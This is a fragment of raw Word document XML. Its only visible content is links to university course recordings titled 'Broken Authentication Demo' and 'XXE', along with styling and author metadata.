          <w:t>https://kumaragurudtsteam.sharepoint.com/sites/ODD22-23-U18INI5600L-ENGINEERINGCLINIC-V-Slot-A1-ISE/_layouts/15/stream.aspx?id=%2Fsites%2FODD22%2D23%2DU18INI5600L%2DENGINEERINGCLINIC%2DV%2DSlot%2DA1%2DISE%2FShared%20Documents%2FGeneral%2FA2%2D%20Broken%20Authentication%20Demo%2D20221210%5F152551%2DMeeting%20Recording%2Emp4&amp;referrer=Teams%2ETEAMS%2DELECTRON&amp;referrerScenario=teamsSdk%2DopenFilePreview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20A72B20" w14:textId="5C585F49" w:rsidR="00656802" w:rsidRDefault="00656802">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454C5DB1" w14:textId="17BF14CF" w:rsidR="00656802" w:rsidRDefault="00656802">
      <w:pPr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Xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="002D302D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://kumaragurudtsteam.sharepoint.com/sites/ODD22-23-U18INI5600L-ENGINEERINGCLINIC-V-Slot-A1-ISE/_layouts/15/stream.aspx?id=%2Fsites%2FODD22%2D23%2DU18INI5600L%2DENGINEERINGCLINIC%2DV%2DSlot%2DA1%2DISE%2FShared%20Documents%2FGeneral%2FXXE%2Emp4&amp;referrer=Teams%2ETEAMS%2DELECTRON&amp;referrerScenario=teamsSdk%2DopenFilePreview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="426A3D4D" w14:textId="77777777" w:rsidR="00656802" w:rsidRPr="005B3972" w:rsidRDefault="00656802">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00656802" w:rsidRPr="005B3972" w:rsidSect="006F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708"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F386FB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23EB0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59C2D3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11F92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF20DF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A7EB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5186D3F2"/>
    <w:lvl w:ilvl="0" w:tplc="ACC4537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72657"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="032E77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56E1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB306792"/>
    <w:lvl w:ilvl="0" w:tplc="12F23A9C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 w16cid:durableId="1771966870">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="188615204">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="65761099">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="826629026">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1003557249">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1515074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769"/>
    <w:rsid w:val="001E46EB"/>
    <w:rsid w:val="00244B42"/>
    <w:rsid w:val="0053498C"/>
    <w:rsid w:val="005B3972"/>
    <w:rsid w:val="00656802"/>
    <w:rsid w:val="00670873"/>
    <w:rsid w:val="006F2EDA"/>
    <w:rsid w:val="00747877"/>
    <w:rsid w:val="00B2010F"/>
    <w:rsid w:val="00B81C70"/>
    <w:rsid w:val="00CC3769"/>
    <w:rsid w:val="00D972CD"/>
    <w:rsid w:val="00FA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498C"/>
  <w15:docId w15:val="{524D6285-AF7D-B544-B844-7A38480C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7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7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align">
    <w:name w:val="md-align"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00747877"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00747877"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00747877"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="d-none">
    <w:name w:val="d-none"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00747877"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00656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7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31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8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maragurudtsteam.sharepoint.com/sites/ODD22-23-U18INI5600L-ENGINEERINGCLINIC-V-Slot-A1-ISE/_layouts/15/stream.aspx?id=%2Fsites%2FODD22%2D23%2DU18INI5600L%2DENGINEERINGCLINIC%2DV%2DSlot%2DA1%2DISE%2FShared%20Documents%2FGeneral%2FXXE%2Emp4&amp;referrer=Teams%2ETEAMS%2DELECTRON&amp;referrerScenario=teamsSdk%2DopenFilePreview" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kumaragurudtsteam.sharepoint.com/sites/ODD22-23-U18INI5600L-ENGINEERINGCLINIC-V-Slot-A1-ISE/_layouts/15/stream.aspx?id=%2Fsites%2FODD22%2D23%2DU18INI5600L%2DENGINEERINGCLINIC%2DV%2DSlot%2DA1%2DISE%2FShared%20Documents%2FGeneral%2FA2%2D%20Broken%20Authentication%20Demo%2D20221210%5F152551%2DMeeting%20Recording%2Emp4&amp;referrer=Teams%2ETEAMS%2DELECTRON&amp;referrerScenario=teamsSdk%2DopenFile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AARTHI</dc:creator>
  <cp:lastModifiedBy>Ashwath M Ram 20BIS201</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-22T16:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-23T04:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>